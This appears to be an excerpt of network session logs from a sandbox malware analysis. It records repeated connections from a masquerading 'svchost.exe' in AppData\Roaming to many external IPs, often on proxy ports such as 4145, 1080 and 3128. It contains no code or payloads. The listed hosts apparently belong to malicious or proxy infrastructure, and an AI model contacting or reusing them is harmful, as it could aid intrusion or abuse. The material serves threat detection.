Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3945	192.168.2.5	62502	104.22.14.48	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3946	192.168.2.5	62447	104.17.248.164	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3947	192.168.2.5	62507	104.16.224.33	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3948	192.168.2.5	62465	199.102.105.242	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3949	192.168.2.5	61518	162.241.158.204	52980	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3950	192.168.2.5	62466	184.170.245.148	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3951	192.168.2.5	62521	172.67.182.107	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3952	192.168.2.5	62528	172.67.200.220	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3953	192.168.2.5	62536	104.17.66.69	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3954	192.168.2.5	62539	104.18.237.128	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3955	192.168.2.5	62538	104.21.85.200	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3956	192.168.2.5	62486	60.246.122.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3957	192.168.2.5	62470	47.243.205.1	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3958	192.168.2.5	62506	46.17.63.166	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3959	192.168.2.5	62467	103.23.100.1	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3960	192.168.2.5	62497	54.233.119.172	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3961	192.168.2.5	62509	82.165.105.48	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3962	192.168.2.5	61555	165.227.196.37	63637	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3963	192.168.2.5	62565	104.20.179.187	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3964	192.168.2.5	62573	172.67.187.242	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3965	192.168.2.5	62576	104.16.241.204	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3966	192.168.2.5	62496	88.210.20.144	20000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3967	192.168.2.5	62481	49.228.131.169	5000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3968	192.168.2.5	62518	147.75.34.86	10010	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3969	192.168.2.5	62582	142.4.123.41	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3970	192.168.2.5	62515	116.203.28.43	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3971	192.168.2.5	62529	43.131.242.162	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3972	192.168.2.5	62583	157.185.157.151	26589	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3973	192.168.2.5	62598	162.243.102.207	9764	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3974	192.168.2.5	62349	45.81.232.17	27308	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3975	192.168.2.5	62532	20.24.43.214	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3976	192.168.2.5	62561	89.38.99.29	20551	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3977	192.168.2.5	61636	148.72.206.84	2536	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3978	192.168.2.5	62592	93.190.142.57	31243	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3979	192.168.2.5	62594	178.54.21.203	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3980	192.168.2.5	61674	164.92.86.113	62987	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3981	192.168.2.5	61728	62.171.169.37	58402	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3982	192.168.2.5	61734	202.137.141.212	5678	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3983	192.168.2.5	61703	195.138.73.54	44017	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3984	192.168.2.5	62543	36.134.91.82	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3985	192.168.2.5	62324	107.181.168.145	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3986	192.168.2.5	61750	203.202.253.108	5020	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3987	192.168.2.5	61884	104.236.0.129	22167	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3988	192.168.2.5	61774	51.15.133.214	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3989	192.168.2.5	61846	159.223.71.71	51616	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3990	192.168.2.5	61917	24.152.40.49	8080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3991	192.168.2.5	61861	45.117.179.179	6522	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3992	192.168.2.5	61943	172.93.111.87	43520	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3993	192.168.2.5	62475	184.170.248.5	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3994	192.168.2.5	61984	167.86.69.142	42214	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3995	192.168.2.5	62440	79.110.196.145	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3996	192.168.2.5	61911	119.3.215.41	8888	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3997	192.168.2.5	62379	117.160.250.134	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3998	192.168.2.5	62056	37.32.98.160	38440	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3999	192.168.2.5	62003	177.234.244.174	32213	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4000	192.168.2.5	62444	5.180.19.163	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4001	192.168.2.5	61551	203.96.177.211	33382	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4002	192.168.2.5	62112	74.208.12.35	37339	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4003	192.168.2.5	61827	117.160.250.163	82	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4004	192.168.2.5	62541	189.240.60.169	9090	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4005	192.168.2.5	62104	31.148.207.153	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4006	192.168.2.5	62490	128.199.221.91	50223	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4007	192.168.2.5	62571	45.61.188.134	44499	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4008	192.168.2.5	62559	181.78.19.247	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4009	192.168.2.5	62323	86.8.163.88	9150	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4010	192.168.2.5	62545	195.248.243.149	7237	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4011	192.168.2.5	62544	136.244.99.51	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4012	192.168.2.5	59990	72.167.221.157	64742	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4013	192.168.2.5	62211	111.53.178.249	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4014	192.168.2.5	59929	50.63.12.101	32423	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4015	192.168.2.5	61527	190.97.238.94	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4016	192.168.2.5	61566	162.214.170.144	37592	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4017	192.168.2.5	62350	72.206.181.97	64943	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4018	192.168.2.5	60163	45.11.95.165	6014	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4019	192.168.2.5	61297	142.54.226.214	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4020	192.168.2.5	60370	103.148.192.83	8089	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4021	192.168.2.5	60353	203.96.177.211	15901	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4022	192.168.2.5	60416	91.134.140.160	49042	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4023	192.168.2.5	60478	62.33.207.202	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4024	192.168.2.5	60468	51.161.131.84	58612	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4025	192.168.2.5	60500	47.93.113.251	3129	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4026	192.168.2.5	60599	164.92.237.188	63373	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4027	192.168.2.5	60690	104.200.135.46	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4028	192.168.2.5	60540	195.114.209.50	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4029	192.168.2.5	60551	148.66.130.53	15345	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4030	192.168.2.5	62585	41.65.224.91	1981	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4031	192.168.2.5	62602	119.196.168.183	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4032	192.168.2.5	62605	45.120.178.197	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4033	192.168.2.5	62604	8.219.177.134	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4034	192.168.2.5	62513	120.197.40.219	9002	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4035	192.168.2.5	62606	34.95.243.122	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4036	192.168.2.5	62603	103.127.1.130	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4037	192.168.2.5	62624	218.145.131.182	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4038	192.168.2.5	62468	72.195.114.169	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4039	192.168.2.5	62133	52.151.210.204	9000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4040	192.168.2.5	60011	149.28.141.180	65201	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4041	192.168.2.5	62173	185.104.63.54	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4042	192.168.2.5	62680	218.145.131.182	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4043	192.168.2.5	62607	184.170.245.148	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4044	192.168.2.5	62143	178.33.163.156	42380	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4045	192.168.2.5	62608	90.188.250.16	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4046	192.168.2.5	62645	104.24.35.152	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4047	192.168.2.5	62660	185.162.228.170	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4048	192.168.2.5	62684	218.145.131.182	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4049	192.168.2.5	62686	218.145.131.182	443	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4050	192.168.2.5	55298	51.222.241.8	36219	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4051	192.168.2.5	62183	184.178.172.14	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4052	192.168.2.5	62612	154.12.178.107	29985	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4053	192.168.2.5	62642	94.131.60.206	58378	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4054	192.168.2.5	62616	136.244.99.51	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4055	192.168.2.5	60658	166.62.85.184	21946	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4056	192.168.2.5	62640	54.178.159.199	18080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4057	192.168.2.5	62231	47.90.126.78	8118	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4058	192.168.2.5	62617	45.11.95.165	6014	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4059	192.168.2.5	62676	107.181.168.145	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4060	192.168.2.5	62610	193.151.130.114	8086	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4061	192.168.2.5	62658	134.209.29.120	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4062	192.168.2.5	62672	162.243.102.207	9764	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4063	192.168.2.5	60675	36.64.22.18	8199	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4064	192.168.2.5	62278	82.113.157.122	31280	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4065	192.168.2.5	62641	154.85.125.235	6446	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4066	192.168.2.5	62669	60.246.122.244	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4067	192.168.2.5	62677	46.17.63.166	16379	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4068	192.168.2.5	62666	52.67.10.183	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4069	192.168.2.5	62668	138.36.199.14	4153	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4070	192.168.2.5	62670	47.243.205.1	3128	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4071	192.168.2.5	62678	43.131.242.162	15673	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4072	192.168.2.5	62229	78.133.163.190	4145	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4073	192.168.2.5	62673	178.54.21.203	8081	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4074	192.168.2.5	60781	91.148.127.162	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4075	192.168.2.5	62667	125.94.219.96	9091	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4076	192.168.2.5	55523	192.169.226.96	50578	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4077	192.168.2.5	62642	94.131.60.206	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4078	192.168.2.5	62671	49.228.131.169	5000	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4079	192.168.2.5	62692	181.78.19.248	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4080	192.168.2.5	60784	94.131.106.208	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4081	192.168.2.5	62685	195.90.216.75	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4082	192.168.2.5	61863	103.97.179.115	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4083	192.168.2.5	62327	162.241.207.217	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4084	192.168.2.5	62664	122.114.232.137	808	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4085	192.168.2.5	55466	165.227.104.122	58839	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4086	192.168.2.5	60759	103.132.92.110	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

